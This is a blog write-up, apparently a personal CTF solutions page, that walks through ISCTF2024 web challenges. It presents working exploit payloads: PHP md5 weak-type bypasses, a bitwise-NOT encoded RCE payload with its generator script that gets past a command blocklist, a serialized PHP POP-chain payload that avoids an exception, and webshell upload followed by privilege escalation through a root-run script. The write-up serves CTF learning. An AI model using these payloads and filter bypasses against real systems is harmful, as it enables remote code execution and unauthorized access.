Home

# ISCTF2024 复现

# 25 时晓山瑞希生日会

htt 头伪造:

伪造日期:

搜索得知 25 时生日会 是在八月二十七举办,伪造日期即可得到 flag

Date: Tue, 27 Aug 2024 12:41:59 GMT

# 小蓝鲨的冒险

<?php
  error_reporting(0);
highlight_file(__FILE__);
$a = "isctf2024";
$b = $_GET["b"];
@parse_str($b);
echo "小蓝鲨开始闯关,你能帮助他拿到flag吗?<br>";
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
  $num = $_POST["num"];
  echo "第一关有惊无险!小蓝鲨壮着胆子接着继续往下走!<br>";
  if($num == 2024){
    die("QAQ小蓝鲨误入陷阱,不怕,再接再厉!");
  }
  if(preg_match("/[a-z]/i", $num)){
    die("陷阱太多QAQ");
  }
  if(intval($num,0) == 2024){
    echo "到这了难道还要放弃吗?<br>";
    if (isset($_GET['which'])){
      $which = $_GET['which'];
      echo "小蓝鲨貌似在哪里见过这个陷阱O.o?继续加油,还差最后一步了!";
      switch ($which){
        case 0:
        print('QAQ');
        case 1:
        case 2:
        require_once $which.'.php';
        echo $flag;
        break;
        default:
        echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
        break;
      }
    }
  }
}

第一层:考察 md5 弱比较和 parse_[str 函数](https://so.csdn.net/so/search?q=str 函数 & spm=1001.2101.3001.7020)

0e 开头后面全为数字,弱类型比较都等于 0,用 s878926199a 绕过

image-20241120215430046

image-20241120215439925

parse_str 把字符串 a [0] 当成变量解析,从而赋值

第二层:num 中不能有字母,还不能等 2024,,同时还要绕过 intval 函数

使用进制转化绕过,八进制中不含字母,可以使用 0 3750 绕过

第三层:直接写个 flag 就绕过了

综上,写入以下 payload 即可绕过:

?b=a[0]=s878926199a&which=flag
num=03750

ezrce
源码如下:

<?php
error_reporting(0);
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
        die("Blocked by security filter!");
    } else {
        eval($cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>
利用无数字字母 rce 之取反,即可绕过。脚本如下:


<?php
// 在命令行中运行
/*author yu22x*/
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
payload 如下:


?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);



# 小蓝鲨的秘密


这题点开链接就是官网,能直接打官网嘛,包不能的,考虑重定向


抓一个点击链接的包即可得到 flag(这个没想到)


image-20241120215631765


天命人

源码如下:

";
    public $zhi;
    public $shan;

    function __get($j)
    {
        echo "此地阴阳二气略显虚浮,加上刚刚带入的阳气,或可借此遁逃!
";
        $yin="s214587387a";
        $yang=$_GET['J'];
        if (md5($yin)==$yang&&md5($yin)==md5($yang)){
            echo "哦?又一个不信天命之人?行了,拿了东西速速离开吧
";
            system('cat /flag');
        }
    }

}
class Huoyanjinjing{
    public $huoyan;
    public $jinjing;
    function __get($huo)
    {
        $this->huoyan="火眼能洞察一切邪祟!
";
        echo $this->huoyan->jinjing;
    }
    function __invoke()
    {
        $this->jinjing="金睛能看破世间迷惘!
";
        echo $this->huoyan->jinjing;
    }
}
class Dinghaishenzhen{
    public $Jindou="一个筋斗能翻十万八千里!
";
    public $yun;

    function __toString()
    {
        $f=$this->yun;
        $f();
        return "你真的逃出去了吗?天命人?
";
    }

}
class Jingdouyun{
    public $Qishier=72;
    public $bian="看俺老孙七十二变!
";

    function __sleep()
    {
        echo "三更敲门,菩提老祖送我筋斗云...
";
        echo new Jindouyun();
    }

}
class Tianmingren {
    public $tianming;
    public $ren;
    function __destruct()
    {
        echo "迷途中的羔羊,你相信天命吗?
";
        echo $this->tianming;
    }
}
$data = unserialize($_POST['Wukong']);
throw new Exception('开局一根棍,装备全靠打。');
```

命令执行部分是个简单的 md5 绕过

0e215962017 的 MD5 值也是由 0e 开头,在 PHP 弱类型比较中相等

链子部分就正常的构造,链子如下:

```
Tianmingren->Dinghaishenzhen->Huoyanjinjing->Wuzhishan
```


先创建 Tianmingren 对象触发 __destruct() 魔术方法
将tianming 赋值为 Dinghaishenzhen 对象触发 __toString() 魔术方法
将属性 yun 赋值为Huoyanjinjing 对象,对象被当成函数调用触发 __invoke() 魔术方法
将属性 huoyan 赋值为 Wuzhishan 对象,访问对象不存在的属性 jinjing 触发 __get() 魔术方法

```php
$payload=new Tianmingren();
$payload->tianming=new Dinghaishenzhen();
$payload->tianming->yun = new Huoyanjinjing();
$payload->tianming->yun->huoyan=new Wuzhishan();
```

然后需要绕过 throw new Exception,反序列化后直接触发抛出异常导致程序不能正常往下走

然后需要绕过 throw new Exception,反序列化后直接触发抛出异常导致程序不能正常往下走

使用数组进行绕过

```
$exp = array($payload,0);
echo (serialize($exp));

// a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";s:40:"一个筋斗能翻十万八千里!
";s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";s:40:"俺老孙定要踏破这五指山!
";s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:1;i:0;}
```

将输出 payload 的第二个值索引置空即可绕过异常机制,强制触发__destruct()

```
a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";s:40:"一个筋斗能翻十万八千里!
";s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";s:40:"俺老孙定要踏破这五指山!
";s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:0;i:0;}
```

传入 payload 即可得到 flag
![image-20241120215848871](https://zty--666.oss-cn-shanghai.aliyuncs.com/202411202158317.png)

### 小蓝鲨的临时存储室

没有任何限制,php一句话密码进去,然后发现一段时间被删了,直接/flag被拒绝了,那就是suid提权

```bash
find / -perm -u=s -type f 2>/dev/null
```

但是这个好像没用

找一下有root权限还给看修改的可执行文件

发现根目录下的/down_file.sh,进去发现就是它在删php文件,直接给它这行代码删了直接加点小料

```php
#!/bin/bash
cat /flag>/111.txt;
```

最后找到111.txt,可以打开

![image-20241120222032523](https://zty--666.oss-cn-shanghai.aliyuncs.com/202411202220622.png)

![image-20241120222040012](https://zty--666.oss-cn-shanghai.aliyuncs.com/202411202220120.png)

获取flag


  


   


    

  
    
      
    
    Edited on
    
  



      


  
  
Give me a cup of [coffee]~( ̄▽ ̄)~*

  

      
      

        odiws WeChat Pay
        
WeChat Pay

      

      
      

        odiws Alipay
        
Alipay

      

      
      

        odiws PayPal
        
PayPal